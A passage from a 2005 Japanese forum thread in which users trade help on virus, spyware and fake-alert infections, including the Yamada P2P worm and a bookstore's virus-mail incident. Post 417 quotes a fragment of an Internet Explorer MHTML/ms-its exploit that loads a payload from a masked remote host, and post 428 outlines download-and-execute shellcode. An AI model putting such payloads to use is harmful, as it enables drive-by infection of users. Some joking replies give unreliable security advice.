「MHTML URL のプロセスの脆弱性」のよく寄せられる質問 - CAN-2004-0380:
どのようなことが起こる可能性がありますか?

これは、リモートでコードが実行される脆弱性です。
攻撃者にこの脆弱性が悪用され、
Internet Explorer のマイ コンピュータのセキュリティ ゾーンで任意のコードが実行される可能性があります。
攻撃者はマイ コンピュータ ゾーンで HTML コードを実行し、影響を受けるコンピュータの完全な制御を取得する可能性があります。
攻撃者は、そのコンピュータ上でプログラムのインストール、データの表示、変更、削除、完全な資格情報を持つアカウントを新規で作成するなど、
任意の操作を実行する可能性があります。

MHTML URL とは何ですか?
MHTML とは、 MIME Encapsulation of Aggregate HTML (英語情報) の意味で、電子メール メッセージの本文内の
HTML コンテンツを送るために使用される MIME (Multipurpose Internet Mail Extensions) 構造を定義するインターネット標準です。
Windows の MHTML URL ハンドラ は、Outlook Express の一部で、アプリケーション内でレンダリングする MHTML 形式でエンコードされた文書を有効にする、
URL の 1 つの種類 (MHTML://) を提供します。
そのため、Internet Explorer などのアプリケーションは、Outlook Express を使用して、MHTML 形式でエンコードされた文書を処理します。
409名無しさん@お腹いっぱい。:2005/05/19(木) 14:48:36
この脆弱性により、攻撃者は何を行う可能性がありますか?
攻撃者はこの脆弱性を悪用し、ユーザーのコンピュータ上にアクセスし、任意のコードを実行する可能性があります。
このようなコードは、現在ログオンしているユーザーのセキュリティ コンテキストで実行される可能性があります。

攻撃者はどのようにこの脆弱性を悪用する可能性がありますか?
リモートでコードが実行される脆弱性が存在し、特別な細工がされた MHTML URL が処理される際に、
Internet Explorer のマイ コンピュータのセキュリティ ゾーンで攻撃者の HTML コードが実行される可能性があります。
これにより、攻撃者は該当のコンピュータの完全な制御が取得される可能性があります。
Web ベースの攻撃シナリオで、攻撃者がこの脆弱性を悪用するには、この脆弱性を悪用するための Web ページを含む Web サイトをホストすることが必要条件となります。
攻撃者は、ユーザーをそのような悪質なサイトに強制的に訪問させるようにすることはできません。
その代わり、攻撃者は通常、攻撃者のサイトに移動するリンクをユーザーにクリックさせることにより、そのような Web サイトにユーザーを訪問させるように誘導します。
また攻撃者は、この脆弱性を悪用するように設計した HTML 形式の電子メール メッセージを作成し、ユーザーがそのメッセージを表示するように誘導する可能性があります。
ユーザーが攻撃者の Web サイトを訪問するか、または攻撃者が作成した HTML 形式の電子メール メッセージを表示すると、ユーザーのコンピュータのマイ コンピュータ ゾーンで、
攻撃者の任意の HTML コードが実行される恐れがあります。
攻撃者はこの脆弱性を悪用し、ユーザーのコンピュータ上のファイルにアクセスし、任意のコードを実行する可能性があります。
このようなコードは、その際にログオンしているユーザーのセキュリティ コンテキストで実行される可能性があります。

更新プログラムは何を修正しますか?
この更新プログラムは、Outlook Express が MHTML URL を処理する方法を変更することによってこの脆弱性を排除します。
410名無しさん@お腹いっぱい。:2005/05/19(木) 14:50:52
>>408-409
おもいっきり詩ね
411名無しさん@お腹いっぱい。:2005/05/19(木) 15:09:44
>>406
報道ではウィルス付きメールとされてるのに、それには触れてないね。
丸善、メルマガ登録者にウイルスメール送信
http://www.asahi.com/national/update/0519/TKY200505190173.html
412名無しさん@お腹いっぱい。:2005/05/19(木) 15:15:37
ああ やだ
日本全国 厨IT企業続出!
管理出来ないんだから事業なんて興さなきゃいいのに!
413名無しさん@お腹いっぱい。:2005/05/19(木) 15:19:59
丸善がML用のメアドを1つ作っていて,
外部からもそこへ送れば登録者全員に
一斉配信されるようになっていたらしい.
※これが元凶

おそらく外部のnetsky.pに感染したマシンから,
そのアドレスへウィルスを発信し,
それが丸善経由で登録者へ,
登録者側の一部のサーバーからのbounceも
またそのメアド向けに出されるわ,
受け取ったヤツが苦情や登録解除依頼を
送り返したり云々
・・・・でこの騒ぎになったと思われ.
414名無しさん@お腹いっぱい。:2005/05/19(木) 15:33:11
>>413
うん 素晴らしい
その話を仮定すると少なくとも3回はウィルスチェックされる可能性はあったわけだ
まず、リモートから送る際のパソコン内部でのチェック、
次に、メールサーバ側での受信時、
そして最終関門であるメールサーバーからの配信時、
まさか、また全部例のソフトメーカーか?
415名無しさん@お腹いっぱい。:2005/05/19(木) 15:34:01
>>413
↓これと同じようなものかな。
武蔵野市がウイルス・メールを誤配信,感染報告はゼロ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050317/157600/
416名無しさん@お腹いっぱい。:2005/05/19(木) 15:51:42
【社会】大手書店「丸善」がウイルスメールを配信
http://news19.2ch.net/test/read.cgi/newsplus/1116483190/
417名無しさん@お腹いっぱい。:2005/05/19(木) 15:53:25
<script language="JavaScript">
</script>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.*****.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

そして、ここへ繋がる
418名無しさん@お腹いっぱい。:2005/05/19(木) 15:57:15
>>417
またお前か。
419名無しさん@お腹いっぱい。:2005/05/19(木) 15:58:26
>>414
丸善のメール配信がどういうシステム構成か、詳しいことは分からないけど・・・
そもそもの問題は、外部の不特定アドレスから来たメールを
そのままメーリングリストに再配信するような大穴開いた設定してたことだと思われ。

セキュリティソフト以前の問題なんだから、そこまでカバーしろってのも
セキュリティベンダーに対して酷な話じゃないかな。
420名無しさん@お腹いっぱい。:2005/05/19(木) 16:02:13
>>419
来たメールをウィルススキャンするだけでいいはずだから、
セキュリティベンダーの問題じゃなくて、丸善の問題だろうね。
421名無しさん@お腹いっぱい。:2005/05/19(木) 17:39:45
丸善から届いたメールです。

----------------------------------------------------------------------------
InterScan により、ウイルス感染ファイルが検出されました。

送信者 = [email protected](←伏せ字に変更しました。見覚えのない誰かのアドレスです)
受信者 = [email protected]
件名 = Re: Delivery Protection
検出日時 = 2005/05/19 3:46:19
検索エンジン/パターンファイル = 7.510-1002/2.635.00

ウイルス検出時の処理:
添付ファイル details.zip には WORM_NETSKY.P ウイルスが含まれています。InterScanにより削除されました。

受信者への警告!InterScan
422名無しさん@お腹いっぱい。:2005/05/19(木) 17:42:11
>>421
乙と言いたいところだが、ヘッダもキボンヌ
423名無しさん@お腹いっぱい。:2005/05/19(木) 17:43:32
>>421
ウィルスメールがばら撒かれたんじゃなくて、ウィルス警告メールがばら撒かれたんだな。
424名無しさん@お腹いっぱい。:2005/05/19(木) 17:55:10
avastってデスクトップPC専用なの?
ノートPCには使えない?
425名無しさん@お腹いっぱい。:2005/05/19(木) 17:58:00
>>417
      .l''',!     .r-、      .,、=@      .l''',!     ./ー、,,,_     .r-,
   .广''''″.¨゙゙!  .,,,丿 {,,、、,  .v-l゙ .!-r/i、  广''''″.¨゙゙!   .!、,  l゙     | .} ,
   .゙l---, ぃ"  .|     .|   .|   _,,{゙l .ヽ  ヽ--i、 .ぃ"  .,,,,,,,,二i"   .,..-" .ヽl、゙l
   r---┘.―'i、 "',! ./ニニニ、   ̄| .L,,,,,゙l,,i´ .r---┘.―'i、  .|    :,!   |    .l .|、
   |__ ._,,,,}  ノ .| |   l゙  ./   ゙'i、 .|__ ._,,,,}  "''''ツ ./   "''ト .|゙i、 ||、゙l
   .,―-" |    .ノ .l゙ `"゙゙゙'"  ,i´,〕゙゙^'i、 |  .,―-" |     ../  `i、    l゙ ,l゙ | |.゙l.,ノ
   .l゙ .,,,,,, .\  .l゙ .l゙ ,,    .l゙ .|.} |  | .|  / .,,,,,, .\   ../ .,.i、 |    l゙ .l゙ .| .,! .゛
   | し,,l゙ .、 ゙,! ,l゙ ,l゙.i".゙゙'''''"! ゙l .″.|.,!'''゛ l゙  | .l゙,,,,l゙ .、 ゙,! ,/`/ .| ."'゙゙l ./ .l゙r┘,l゙
   .゙l,  .,/`∪  ゙〃 .`ー--丿 .゙'--ヽ{,,,./  .゙l,,  _/`∪ .゙l.,i´  .!,_,,,/ .l゙../ | .,i´ 

  
426名無しさん@お腹いっぱい。:2005/05/19(木) 20:27:13
丸善ワロスwwww
ヘタレ管理者どもはとっとと氏んどけwww
427名無しさん@お腹いっぱい。:2005/05/19(木) 20:51:48
>>404
>>405
ありがとうございます。XPのSP2になっておりました。
WindowsUpdateでインストールの履歴を見ることもできました。
重ねて感謝いたします。
428名無しさん@お腹いっぱい。:2005/05/19(木) 20:56:30
Internet Explorerでバッファオーバーフローが発生します。
さらに、ローカルマシンにリモートファイルをダウンロードし、
そのファイルをローカルファイルに保存し、
さらにダウンロードしたファイルを実行するように指示するシェルコードが実行されます。

>この際のシェルコードってのが、
>バッファオーバーフローが発生した時のリターンアドレスに仕込まれるプログラムコードになります。
>そして、リターンアドレスは常に決まっていて固定なので、
起こす前にメモリ上にセットしておけばいいわけです。

以上
429名無しさん@お腹いっぱい。:2005/05/19(木) 22:15:03
今、ネットに接続してヤフーのニュースを見てオークション見てページを閉じたら、
デスクトップに「~」って名前のファイルがいきなり出てきたんだけど・・・
ウィルスに感染したらこんなファイルができることとかってある?
よくわかんないからとりあえず捨てたんだけど・・・
430名無しさん@お腹いっぱい。:2005/05/19(木) 22:17:18
>>429
WinFAQにある
431名無しさん@お腹いっぱい。:2005/05/19(木) 22:20:32
>>430
さんくす!
単なる勘違いでしたねw
432名無しさん@お腹いっぱい。:2005/05/20(金) 01:08:30
WinFuCkにある。
433名無しさん@お腹いっぱい。:2005/05/21(土) 02:29:55
自動解凍のファイルだと思ってダブルクリックしたら、ウイルスだったようで
HDDの残り容量が20Gちょい→いっきに30Mになってしまい、このままでは電源落とすと
OSが起動しなくなりそうです・・・。どこかにファイルを大量コピーされたのだと
思うのですが、このようなタイプのウイルスの場合どうやって大量コピーされたファイルの場所を
探せばよいですか?OSはXPのホームエディション、セキュリティはノートンインターネットセキュリティ2005
両方ともUPは最新までしてあります。
434名無しさん@お腹いっぱい。:2005/05/21(土) 02:35:10
>>433
とりあえず、スキャンしてみたら?
435433:2005/05/21(土) 02:40:03
それがドライブ全部ノーdでスキャンしたんですが、引っかからないのですよ・・・
436名無しさん@お腹いっぱい。:2005/05/21(土) 02:44:40
>>435
オンラインスキャンは無理かね?
437433:2005/05/21(土) 02:47:12
すいません・・・色々フォルダ見てたら自分の目にソレらしきファイルがスキャンされましたorz
1個1Gのjpgとか・・・
438名無しさん@お腹いっぱい。:2005/05/21(土) 07:33:33
>>437
>自分の目にソレらしきファイルがスキャンされました
慌てるなw スキャン出来る目を持ってて何より何より
439名無しさん@お腹いっぱい。:2005/05/21(土) 11:18:21
ウイルスに感染したみたいで、MCAfeeのウイルススキャンで
スキャンしてみたのですが、ウイルスなし、と出ます
MCAfeeのスキャンではひっかからないウイルスなのでしょうか…
ちゃんとしたウイルススキャンを買ってきてスキャンしたほうがいいのでしょうか…
440名無しさん@お腹いっぱい。:2005/05/21(土) 11:34:31
>>439
他のは試してみたのか?シマンテックとか。
441名無しさん@お腹いっぱい。:2005/05/21(土) 12:25:05
インターネットウイルルスキャンとかですか?
今からやってみます
442名無しさん@お腹いっぱい。:2005/05/21(土) 13:02:03
>>441
そのexe実行した日付でファイルの検索をかけてみたら?
443名無しさん@お腹いっぱい。:2005/05/21(土) 13:04:44
>>442
「システムの復元」使う手もあるな。
444名無しさん@お腹いっぱい。:2005/05/21(土) 13:19:47
すみません、PCの事全然わからないんですけど
今とりあえずシマンテックのオンラインスキャンやってるんですけど
>>442
>>443
ファイルの検索ってウインドウズのメニューにある「検索」ですよね(ファイル名をいれて検索するやつ)
それはわかったんですが何を検索すればいいのか
システムの復元もやった事あるのですがそれからどうすれば…
445名無しさん@お腹いっぱい。:2005/05/21(土) 13:26:18
というか>>439はどうしてウイルスに感染してると判ったんだ?
446名無しさん@お腹いっぱい。:2005/05/21(土) 13:44:06
MCafeeが反応したからです
それで、スキャンしても見つからないからおかしいと思ったんです
447名無しさん@お腹いっぱい。:2005/05/21(土) 13:45:56
さっき(といっても1時間以上前)この板の☆☆トロイの木馬☆☆2台目
というスレを開いたら、Bloodhound Exploit6というウィルスに感染したと
ノートン先生が警告した。
一回目のスキャンで検出したけど検疫も削除もできず、慌ててインターネット
一時ファイルを削除してもう一度完全スキャンをしたら検出されなくなった。
今昨日配布されたばかりの定義ファイルをダウンロードしたところだけど、
ウィルスは消えたのだろうか?それともまだ残ってるのか…。
448名無しさん@お腹いっぱい。:2005/05/21(土) 13:50:10
>>447
ノートンの誤反応
スレにあるウイルスコードに反応しただけだから気にすんな
449名無しさん@お腹いっぱい。:2005/05/21(土) 13:54:44
>>446
常駐シールドが発見して削除したんだろう?
それなら実行されない仕様だからその悪質なファイルが実行されなかったんだから
システムに感染してインストールなどされていないから発見などされない
通常Temporary Internet Files以外から発見された場合は、
ウィルスにシステムが犯されていると判断してよい
450名無しさん@お腹いっぱい。:2005/05/21(土) 13:59:25
>>446
もう一つ追加
Tempフォルダ内だけにウィルスが一時展開された状態で残っている状態もあるが、
通常レジストリ内にそのパスで実行される記述がない場合は、
システムに感染していないから削除すれば支障はない
451名無しさん@お腹いっぱい。:2005/05/21(土) 14:00:24
そうなんですか…それなら一安心なんですが
今シマンテックのスキャン見たら終わってて11個のファイルが感染してました

コンピュータは何らかの既知のウイルスまたはトロイの木馬に感染しています。

駆除方法がわからないんですけど、感染ファイルを削除すればいいのでしょうか
452名無しさん@お腹いっぱい。:2005/05/21(土) 14:03:06
>>451
ノートンはTEXTファイルにも反応するから、Temporary Internet Filesを全部削除後に
もう一度スキャンしてみなさい
453名無しさん@お腹いっぱい。:2005/05/21(土) 14:06:43
>>447
そんな時はブラウザの窓を全部閉じてから削除すればいい
454名無しさん@お腹いっぱい。:2005/05/21(土) 14:14:39
やってみます
455名無しさん@お腹いっぱい。:2005/05/21(土) 14:22:29
>>448
そうだったのか…。
LoveLetterあたりはそういうのがあると聞いてシカトしてたけど、
今回のは初めてだからあせった。
なんせおととい職場のPCサイト閲覧だけで感染させて、昨日やっとこ
直してもらったばかりだから…orz
価格コムウィルスじゃないよ。
456名無しさん@お腹いっぱい。:2005/05/21(土) 15:27:27
>>452
スキャン終わりました
感染ファイル0だったのですがこれからどうすればいいのでしょうか
457名無しさん@お腹いっぱい。:2005/05/21(土) 15:30:34
>>456
感染ファイルが無かったのなら万事解決。おめでとう。
458名無しさん@お腹いっぱい。:2005/05/21(土) 15:34:57
そうですか、わかりました
これで安心してインターネットができます
ありがとうございました
459名無しさん@お腹いっぱい。:2005/05/21(土) 19:28:04
山田ヲチスレで、山田感染者のSSを見たんですけど、
ZoneAlaemが入ってたり、NIS2005が入ってたりしてるんですが、
これらFWソフトでも感染後の不正アクセスは防げないもんなんですかね。
詳しい人教えてください。
460名無しさん@お腹いっぱい。:2005/05/21(土) 19:51:21
>>459
ヲチスレの>>1にある、まとめサイトに載ってる(´・ω・)ス 
461名無しさん@お腹いっぱい。:2005/05/21(土) 20:06:51
>>459
山田の巧妙なところは一切インターネットアクセスをしないところ。
つまり、アップフォルダにファイルをコピーするだけだから。
インターネットにアクセスするp2pソフト自体は既にユーザー自身が許可してるから、検知しない。

だから、山田にはNISのFWもZonも無力。
462名無しさん@お腹いっぱい。:2005/05/21(土) 20:45:43
>>461
>>459は「感染後の不正アクセス」の話だと思う(´・ω・)ス
どっちにしろ、板違いスマソ(´・ω・)ス
463名無しさん@お腹いっぱい。:2005/05/21(土) 21:21:30
>>461
そうなんだ。
ってことは、P2Pソフト持ってない人はFW入れとけば大丈夫ってこと?
464名無しさん@お腹いっぱい。:2005/05/21(土) 21:48:43
すみません、ヤマダウイルスの事で質問です。
ヤフーの記事に

Windows 2000/XPの場合はコマンドプロンプトから「netstat -a」を実行し、
httpのLISTENING表示がないか確認するのがよいだろう。
もしこうした文字列があれば、Webサーバの類が動作していることになる。

とあったのですが、これはhttpの横に何らかの文字があったら
全て感染しているという事なんでしょうか?
感染していない場合、している場合はどのように表示されるのか教えて頂きたいのですが。
465名無しさん@お腹いっぱい。:2005/05/21(土) 22:00:06
ヤマダに関してはdown板が一番詳しい。down板へ行くとよろし。
466名無しさん@お腹いっぱい。:2005/05/21(土) 22:00:56
>>464
日本語不自由すぎ。
>>462の最後の行。
467名無しさん@お腹いっぱい。:2005/05/21(土) 23:13:46
なんでウィルスのこと訊くのがスレ違いなのよ?
P2P使ってないやつでもこんだけ山田の書き込み見せられりゃあ不安になるがな。
468名無しさん@お腹いっぱい。:2005/05/21(土) 23:47:21
>>463
>だから、山田にはNISのFWもZonも無力。
469名無しさん@お腹いっぱい。:2005/05/21(土) 23:51:19
山田で投入されるhttpサーバプログラム名は、svchost.exeで
あるため、大抵のNISユーザーは通信を「許可」してしま。

もし、自分が不意に svchostが通信しようとしています。許可しますか?
と聞かれて、しかもそれが高危険度で無いなら、許可にしてしまうだろう。
470名無しさん@お腹いっぱい。:2005/05/21(土) 23:53:33
>>469
山田+キンタマもあるから、httpサーバーで内部公開する上に、
p2pに内部ドキュメント移すってのもある。
471名無しさん@お腹いっぱい。:2005/05/22(日) 00:19:04
>>469
そういうことか。ありがとう。

でも、ZAだったらフルパスで警告でるから気づくことができるね。
安心しました。
自分のPCの中、あんなふうに晒されてるのみると
P2Pつかってなくても寒気がしたもので。
どうもありがとうでした。
472名無しさん@お腹いっぱい。:2005/05/22(日) 01:15:53
>>471
それが、svchost.exeが投入されるパスが
widowsのシステムパスなので、区別するのは難しい。
NISなら、本来のsvchost.exeは自動設定が推奨されているので、
それで判別できる。

しかし、いずれにしてもフォルダを簡単に開かないことだ。
473名無しさん@お腹いっぱい。:2005/05/22(日) 02:06:53
nyしなけりゃ、いいんでね?
474名無しさん@お腹いっぱい。:2005/05/22(日) 02:21:15
>>473
当然だ。今流通しているp2pにはそれ自体に
すでにddos攻撃に類するコードが内在されていることが
判明しているものも多い。特定、共有ファイルが現れた時に
指令を送れるものだ。日本では流行らなかったが。
475名無しさん@お腹いっぱい。:2005/05/22(日) 12:52:56
えらい症状の多いウイルスに感染してかなりこまっています・・・。症状はOSが起動されてデスクトップになったときに
1:「プログラムがビジー状態です。」という真っ青で中くらいの×ボタンのない偽エラーメッセがたくさんでる
2:ゴキブリや蝿の写真が画面内を這い回る
3:ウインドウズの終了メニューを出したときのように画面が灰色になって操作できなくなる(ALT+Tabで下のツールバーだけは触れる)
4:マイドキュメントの中に2chの顔文字が名前に入ったやたら重いjpgがドライブ一杯までコピーされる
といった症状です。起動するたびにすばやくエラーメッセを消したりしないとほぼフリーズのような状態になってしまいます・・・。
OSはXPのホームエディション、ウイルスソフトはノートンインターネットセキュリティ2005。スキャンは感染する前の日に1回と
感染後にも1回行いました。OS、ノートンともにUPで最新Verです。どうかご教授お願いします・・・。
476名無しさん@お腹いっぱい。:2005/05/22(日) 13:26:32
>>475
OKWeb:ウィルスに感染してしまいました。
ttp://okweb.jp/kotaeru.php3?q=1372550
477475:2005/05/22(日) 13:44:58
>>476
ありがとうございました。無事直りました。
478名無しさん@お腹いっぱい。:2005/05/22(日) 18:18:38
>>475さんと同じ症状なのですが

システムの復元が無効にされたまま
有効にしようとすると↓のようなエラーが出てできません・・・
「1つ以上のドライブを有効または無効にしようとした時にエラーが発生しました
、再起動して再試行してください」←再起動後も無理でした

どなたか解決策はないでしょうか?
479名無しさん@お腹いっぱい。:2005/05/22(日) 18:22:37
【使用OS】 XPSP1
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 使ってません
【その他の質問】 コマンドプロンプトにてnetstat -oで確認したところ、
           PID 1060 つまりsvchostでESTABLISHEDとなってました。
           大丈夫でしょうか?問題があったら解決方法をお願いします。
480名無しさん@お腹いっぱい。:2005/05/22(日) 19:27:13
>>479
まずオンラインスキャン汁。
481 ◆uU3usdkgnE :2005/05/22(日) 20:13:32
感染してしまいました・・・TT
長くなりそうなので、ひとまずスキャン中ですが現状を書かせていただきます。

【使用OS】 WinXP
【WindowsUpdateしてるか】 2ヶ月くらいしてません・・・
【AntiVirusは何を使っているか】 ノートン2002
【ちゃんとUpdateしてるか】 ノートンは今朝したばかりです
【スキャンした結果(ウイルス名・発見場所)】 現在スキャン中です。
【別のオンラインスキャンしたならその結果は】 まだしてません
【何をしたらそんなことになったのか】ある画像掲示板を開いたとたん画面が固まって1分後くらいに「コピーしています」
                       と出たので慌ててLANケーブルを抜きました。
【これまでにとった措置】 何か処理をしていたのであわててLANケーブルを抜いたのと、ノートンです。
482 ◆uU3usdkgnE :2005/05/22(日) 20:13:51
【症状を具体的に、分かる限りすべて書く】
見覚えの無いアイコンが3つデスクトップにあります。
 FreeXXX(女の人の顔の一部のアイコン)
 Spy wara Avenger (青くAの文字の丸いアイコン)
Virus Hunter Security(緑でVの文字の丸いアイコン)
この↑3つです。

それとノートンをかけている最中ですが、定期的にIEが立ち上がり
tp://www.clicksearchclick.com/free.php?aff=8を表示しようとします。
LANケーブル抜いたままなので表示はされませんが。

もうひとつ、デスクトップが青くなり以下の文字があります。
Security Warning
A fatal error in IE has occured at 0028:C0011E36 in VXD VMMC00010E 36.
Error was caused by Trojan - Spy. HTML.Smitfraud.c
*System can not function in normal mode.
Please chech you security settings.
*Scan your PC eith any avaliable antivirus/ spywara remo program to
fix the problem.
と白で書かれています。

【その他の質問】
まだスキャン中ですが、スキャンが終わったらLANケーブルをつなげてしまっても
よいのでしょうか?

スキャンが終わりましたら、ウィルスの種類等の記載もします。
長くて申し訳ないです・・。

483名無しさん@お腹いっぱい。:2005/05/22(日) 20:19:49
>>481
こちらへ

アダルトサイト被害対策の部屋
スパイウェア除去ウィザード − 順を追って作業を行うことで問題解決(たぶん)
ttp://www.higaitaisaku.com/removewz01.html
484 ◆uU3usdkgnE :2005/05/22(日) 20:21:10
>>483 ありがとうございます。見てみます。
でもアダルトサイトじゃないのですが・・・^^;
485名無しさん@お腹いっぱい。:2005/05/22(日) 20:25:22
>>484
googkle?
486 ◆N9P3SuvBPo :2005/05/22(日) 20:31:03
エロ助でも同じような質問があった。
>481
>画像掲示板
と言ってるところからDARK LOLITASと見た
>clicksearchclick.comに飛ばされるという症状とサイトは真新しいマルウェアか?
デスクトップのやつは後日キャプってきます。
487 ◆uU3usdkgnE :2005/05/22(日) 20:32:34
>>484
いえ、オンラインゲームのSS掲示板です。
今もノートン中ですが、ぞくぞくと検出される・・・・orz
488名無しさん@お腹いっぱい。:2005/05/22(日) 20:42:16
>>487
ご愁傷様。
でもなんでノートン使ってて未然に防げなかったんだろうね。
489 ◆uU3usdkgnE :2005/05/22(日) 20:45:48
いつからか、
AutoProtectが無効になっているのですが、これが原因でしょうか・・・?
490名無しさん@お腹いっぱい。:2005/05/22(日) 20:57:26
>>488
update してなかったからだろう。
491 ◆uU3usdkgnE :2005/05/22(日) 21:02:03
>>490
ノートンのうpDateはしてたのですが、やっぱりWinのUpDateもしないと意味が無いのでしょうか?
492名無しさん@お腹いっぱい。:2005/05/22(日) 21:06:44
>>491
両方必要です。
493 ◆N9P3SuvBPo :2005/05/22(日) 21:07:36
エロ助スレで困っている人がいるので後で来る。

>>491
windowsのupdateは常識だよ。
これしないと同じ繰り返しになる。
494 ◆uU3usdkgnE :2005/05/22(日) 21:22:34
みなさまありがとうございます。
これからは必ずWindouwUpdateをちゃんとしますorz

ちなみにスキャン終わりました。
以下のものが検出されました。

Trojan.Desktophijack
TrojanHouse
Downloader.Trojan
TrojanHouse
Downlcader.Trojan
Backdoor.Haxdoor.D
Backdoor.Haxdoor.D
Backlcdoor.Tofger
Backdoor.Tofger
Trojan.Anicmoo
Download.Trojan

です。
495名無しさん@お腹いっぱい。:2005/05/22(日) 21:23:53
>>494
凄い量!OSの再インスコした方が良いような気が。
496 ◆uU3usdkgnE :2005/05/22(日) 21:24:59
このうち、修復した感染数が0個
検疫した感染数7個

で、まだ4個感染が残っています。
こういう場合はどうすればいいでしょう?まだLANケーブルはつなげないほうがいいのでしょうか?

質問攻めで本当に申し訳ありません。
497名無しさん@お腹いっぱい。:2005/05/22(日) 21:27:00
>>496
で、まだ4個感染が残っています。

何が残っているのか言わないと誰も何にも言えないと思われ。
>>495 が言っているように、OSを再インスコした方が良いと思いまつ。
498 ◆uU3usdkgnE :2005/05/22(日) 21:28:06
>>495
OS再インスコですかorz
ウィルスに感染するのもはじめてだし、もうわからないことだらけでTT
PC詳しい友人もいないので2chの皆様に頼るしかなくて・・・。
本当に何度も何度もすみませんTT
499 ◆uU3usdkgnE :2005/05/22(日) 21:30:05
すみません。残ってるウィルスは

Trojan.Desktophijack
TrojanHouse
TrojanHouse
Download.Trojan

です。
デスクトップのアイコン3つも削除したほうがいいでしょうか?
500名無しさん@お腹いっぱい。:2005/05/22(日) 21:37:54
atiupdpl.exeが削除しきれないのですが
501名無しさん@お腹いっぱい。:2005/05/22(日) 21:38:49
>>500
safeモードでもダメ?
502名無しさん@お腹いっぱい。:2005/05/22(日) 21:40:43
503名無しさん@お腹いっぱい。:2005/05/22(日) 21:48:26
>>499
Trojan.Desktophijack
http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-trojan.desktophijack.html
Download.Trojan
http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-download.trojan.html

駆除したらこっちのスレのテンプレ見て、スパイウェア駆除ソフトもやれ
そんでも直らなかったらHijack Thisやってログ見てもらえ

エロサイト見たら…助けて下さい!Part54
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/
504名無しさん@お腹いっぱい。:2005/05/22(日) 22:01:27
スパイウェアが多そうだな。

初心者なら、これを入れてみたら?
http://www.hitmanpro.nl/
505 ◆uU3usdkgnE :2005/05/22(日) 22:21:24
>>503
本当にありがとうございます。今からがんばってみます!

みなさん、本当に本当にありがとうございます。
後はできる限り自分の力でがんばってみます。でもわからないことがあったらまたかくかも^^;

本当にありがとうございました
506名無しさん@お腹いっぱい。:2005/05/22(日) 22:44:52
>>505
504はへんてこなオランダ語ソフトだ
厨以外は見向きもしない
507名無しさん@お腹いっぱい:2005/05/22(日) 23:25:41
【使用OS】 WINDOWS 2000
【WindowsUpdateしてるか】 ダイヤルアップなので途中で止まって全然出来ません。
【AntiVirusは何を使っているか】 マカフィーが入ってます。
【ちゃんとUpdateしてるか】 これも全然出来ません。
【スキャンした結果(ウイルス名・発見場所)】 特に引っかかりません。
【別のオンラインスキャンしたならその結果は】 数日前しましたが、問題ありませんでした。

【症状を具体的に、分かる限りすべて書く】
WINDOWSからALERTへのメッセージ(が度々出てきます。)

SYSTEM REGISTRY CORRUPTION DETECTED
Please Follow these Direction
1.Download Repair registry Pro from www.registryfixit.com
2.Install Repair Registry Pro
3.Repair your rigisrty

Failure to repair your registry now may result in date loss


英語苦手なので放置してましたが、レジストリが壊れたからダウンロードして実行しないと
ファイルが壊れるぞと書いてあると言われて慌てました。

508続き:2005/05/22(日) 23:26:37
【何をしたらそんなことになったのか】 前にも度々出ましたが、ここのところ出ないと思ったら
おととい久々に出ました。
何がきっかけなのか他の人も使うことがあるのでわかりません。

【これまでにとった措置】 オンラインスキャンを数日前にしたときは異常なかったです。
毎日クッキーやネット関係のファイルや履歴は削除しています。
オンラインスキャンも時間がかかりほとんど成功出来ません。

【その他の質問】
メッセージを見てアクセスしてダウンロードだけしましたが、どうもおかしいので開けずにそのまま削除しました。
スパイウェア?って聞きなれないものなのですが、これに感染してるのでしょうか?
会社のPCなのですが、派遣社員ということでLANに入れてもらえず、ダイヤルアップなのでUPDATEも時間が
かかり通信しなくなり、ほとんど出来ません。
ウィルス対策ソフトの更新もLANに入ってないからとして貰えず、問題が起こっても他に影響がないという理由で
システムが動いてくれないので困っています。
変な会社なので辞めようと思いますが、とりあえずこれだけは自力で直してのしつけて返そうと思います。
もしかして、システムの誰かが監視しようとしてるのかな?とも思うのですが、
長くてごめんなさい。よろしくお願いいたします。
509初心者:2005/05/23(月) 00:29:15
パソコンを起動すると、英文のアダルトサイトの画面がでてしまい消せないみたいです。×を押すとAre you sure want to quit?の文字 Yesキャンセルどちらを選べばよいのでしょうか?
510名無しさん@お腹いっぱい。:2005/05/23(月) 00:36:46
>>508
www.registryfixit.com  → 210.51.197.28  cn 中国
Creation Date: 10-apr-2005

該当サイトは今年4月10日にサービスを開始しています。サーバーは中国に存在しています。
画像が格納されている www.registryupdate.com はアルゼンチンにサーバーがあります。
サービス開始は今年の4月9日です。

他にもvisit www.reg-scanner.com for your free scan
など、似たものがあります。

"Install Repair Registry Pro "
OSの不具合なら、なぜマイクロソフトに接続せよと出ないのでしょうか。マイクロソフトが第三者のメーカーのレジストリ修正プログラムをダウンロードしろなどと
指示するわけがないことが分かります。
間違いなくスパイウェアです。害が出るのは、対策ソフトと称するソフトを実行してから本格化するのが特徴です。

対策としては、再インストールを強くお勧めします。なぜなら、スパイウェアは多岐にわたる上に、対応が非常に難しいものが多いからです。
社用のPCであれば、とても悠長に駆除している暇はありません。すぐに再インストールして、ください。

なお、侵入経路は、エッチなサイトや怪しいサイトを閲覧していた可能性があります。もしくは、出所不明なプログラムをインストールしたり、実行した可能性もあります。
今後、そのようなことをしないことが肝要です。
511名無しさん@お腹いっぱい。:2005/05/23(月) 00:40:47
>>509
特に害がなければ、そのまま触らずに放っておいてください。
Hなサイトが好きな人に画面を出してくれる親切なプログラムです。
512名無しさん@お腹いっぱい。:2005/05/23(月) 00:51:50
513名無しさん@お腹いっぱい。:2005/05/23(月) 00:57:40
>>511
それも一理ありだな。

こないだ久々に実家かえったとき、家のPCがスパイウェアまみれで、
デスクトップに週代わりで金髪エロのサンプルムービーが置かれるわ
勝手にポップアップ開きまくるわの状態だった。
んで、俺がOS再インスコして、パッチ当ててセッティングしてやったら
親父に、「せっかく毎週楽しみにしてたのに。いらんことすな!」
って言われた。。。orz
514名無しさん@お腹いっぱい。:2005/05/23(月) 01:17:07
>>513
アハハ。
515名無しさん@お腹いっぱい。:2005/05/23(月) 01:47:49
>>346
とりあえずノートンの体験版をインストールして、フルチェックしてみてはどうでしょう?
516名無しさん@お腹いっぱい。:2005/05/23(月) 06:19:51
>>513
親父さんワロスw
